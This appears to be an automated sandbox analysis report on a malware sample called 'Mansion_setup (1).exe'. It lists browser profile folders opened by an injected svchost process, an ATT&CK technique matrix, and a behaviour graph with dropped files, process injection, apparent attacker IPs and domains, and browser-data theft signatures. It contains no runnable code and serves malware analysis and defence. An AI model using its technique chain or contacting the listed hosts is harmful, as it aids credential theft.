Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnails
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
1
DLL Side-Loading
312
Process Injection
1
Masquerading
1
OS Credential Dumping
1
Query Registry
Remote Services1
Data from Local System
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
DLL Side-Loading
3
Virtualization/Sandbox Evasion
LSASS Memory111
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools
Security Account Manager3
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
Process Injection
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing
LSA Secrets1
Application Window Discovery
SSHKeylogging4
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
Remote System Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615829 Sample: Mansion_setup (1).exe Startdate: 15/02/2025 Architecture: WINDOWS Score: 80 64 x.ns.gin.ntt.net 2->64 66 voicesharped.com 2->66 68 19 other IPs or domains 2->68 86 Suricata IDS alerts for network traffic 2->86 88 Connects to many ports of the same IP (likely port scanning) 2->88 90 Drops large PE files 2->90 11 Mansion_setup (1).exe 181 2->11         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 11->52 dropped 54 C:\Users\user\AppData\Local\...\System.dll, PE32 11->54 dropped 56 C:\Users\user\AppData\Local\...\vulkan-1.dll, PE32+ 11->56 dropped 58 14 other files (none is malicious) 11->58 dropped 14 Mansion.exe 55 11->14         started        process6 dnsIp7 82 95.216.224.46, 49833, 49843, 80 HETZNER-ASDE Germany 14->82 60 C:\games\DDR5_NetCache\qtZint.exe, PE32 14->60 dropped 62 C:\games\DDR5_NetCachextractJPEGcmd.exe, PE32 14->62 dropped 18 explorer.exe 44 1 14->18 injected 20 Mansion.exe 9 14->20         started        23 qtZint.exe 2 14->23         started        25 3 other processes 14->25 file8 process9 dnsIp10 27 svchost.exe 18->27         started        31 svchost.exe 18->31         started        33 MSBuild.exe 18->33         started        70 chrome.cloudflare-dns.com 172.64.41.3, 443, 49888, 49890 CLOUDFLARENETUS United States 20->70 process11 dnsIp12 74 time-a-g.nist.gov 129.6.15.28 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 27->74 76 ntp1.net.berkeley.edu 169.229.128.134 UCBUS United States 27->76 80 4 other IPs or domains 27->80 96 Tries to harvest and steal browser information (history, passwords, etc) 27->96 35 wmlaunch.exe 27->35         started        38 chrome.exe 27->38         started        41 msedge.exe 27->41         started        78 45.91.193.85 HOSTCRAMHostCramLLCUS Germany 31->78 98 System process connects to network (likely due to code injection or exploit) 31->98 100 Switches to a custom stack to bypass stack traces 31->100 43 WerFault.exe 33->43         started        signatures13 process14 dnsIp15 92 Writes to foreign memory regions 35->92 94 Allocates memory in foreign processes 35->94 45 dllhost.exe 35->45         started        72 239.255.255.250 unknown Reserved 38->72 47 chrome.exe 38->47         started        50 msedge.exe 41->50         started        signatures16 process17 dnsIp18 84 127.0.0.1 unknown unknown 47->84

This section contains all screenshots as thumbnails, including those not shown in the slideshow.